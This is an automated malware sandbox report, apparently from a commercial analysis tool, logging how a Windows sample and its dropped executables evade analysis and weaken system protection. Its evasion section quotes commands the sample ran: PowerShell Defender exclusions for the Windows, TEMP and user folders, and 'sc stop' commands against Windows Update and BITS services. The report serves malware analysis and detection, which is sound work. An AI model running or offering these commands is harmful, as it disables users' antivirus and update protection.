                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_0040D770
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_0040D770
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_0040D770
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\sysppvrdnvs.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\sysppvrdnvs.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Memory allocated: D60000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Memory allocated: 1B340000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7595
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2154
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Evaded block: after key decision
Source: C:\Windows\sysppvrdnvs.exe | Evaded block: after key decision
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Evasive API call chain: GetLocalTime,DecisionNodes (graph_0-53620)
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Windows\sysppvrdnvs.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Evasive API call chain: RegQueryValue,DecisionNodes,Sleep
Source: C:\Windows\sysppvrdnvs.exe | Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes (graph_0-53043)
Source: C:\Users\user\Desktop\thcdVit1dX.exe | API coverage: 7.8 %
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | API coverage: 3.7 %
Source: C:\Windows\sysppvrdnvs.exe | API coverage: 0.9 %
Source: C:\Windows\sysppvrdnvs.exe TID: 7492 | Thread sleep time: -40000s >= -30000s
Source: C:\Windows\sysppvrdnvs.exe TID: 7492 | Thread sleep count: 275 > 30
Source: C:\Windows\sysppvrdnvs.exe TID: 7804 | Thread sleep time: -102655s >= -30000s
Source: C:\Windows\sysppvrdnvs.exe TID: 8140 | Thread sleep time: -111360s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740 | Thread sleep count: 7595 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740 | Thread sleep count: 2154 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe TID: 8164 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004657B9 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00465854h
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004657B9 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 0046584Dh
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004050E3 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0045C110 FindFirstFileExW
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_0041D64B FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00401D86 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,FindClose
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: 3_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\sysppvrdnvs.exe | Code function: 4_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\sysppvrdnvs.exe | Code function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00407C78 VirtualQuery,GetSystemInfo
Source: C:\Windows\sysppvrdnvs.exe | Thread delayed: delay time: 40000
Source: C:\Windows\sysppvrdnvs.exe | Thread delayed: delay time: 102655
Source: C:\Windows\sysppvrdnvs.exe | Thread delayed: delay time: 111360
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Thread delayed: delay time: 922337203685477
Source: thcdVit1dX.exe, 00000000.00000002.2189354582.0000000002868000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189354582.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, thcdVit1dX.exe, 00000000.00000002.2189354582.000000000289D000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, 4BBF.exe, 00000002.00000002.2288265241.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.000000000074D000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000004.00000002.2523249116.00000000006F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\thcdVit1dX.exe | API call chain: ExitProcess graph end node (graph_0-52623)
Source: C:\Users\user\AppData\Local\Temp\71384504.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\sysppvrdnvs.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004581CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004C9CC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004073CD GetProcessHeap,HeapAlloc
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_004581CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004581CE
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00451908 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00451908
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00451D9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00451D9F
                              Source: C:\Users\user\Desktop\thcdVit1dX.exeCode function: 0_2_00451F2C SetUnhandledExceptionFilter,0_2_00451F2C
                              Source: C:\Users\user\AppData\Local\Temp\4BBF.exeCode function: 2_2_00C91B68 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_00C91B68
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                              Source: C:\Windows\sysppvrdnvs.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop WaaSMedicSvc
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop wuauserv
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop DoSvc
                              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc stop BITS /wait
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: C:\Users\user\AppData\Local\Temp\2355412914.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                              Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_004689CF InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree | 0_2_004689CF
                              Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00466447 AllocateAndInitializeSid,CheckTokenMembership | 0_2_00466447
                              Source: C:\Users\user\Desktop\thcdVit1dX.exe | Code function: 0_2_00452045 cpuid | 0_2_00452045
                              Source: C:\Users\user\AppData\Local\Temp\71384504.exe | Code function: GetLocaleInfoA,strcmp | 3_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: GetLocaleInfoA,strcmp | 4_2_0040F1B0
                              Source: C:\Windows\sysppvrdnvs.exe | Code function: GetLocaleInfoA,strcmp | 17_2_0040F1B0
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
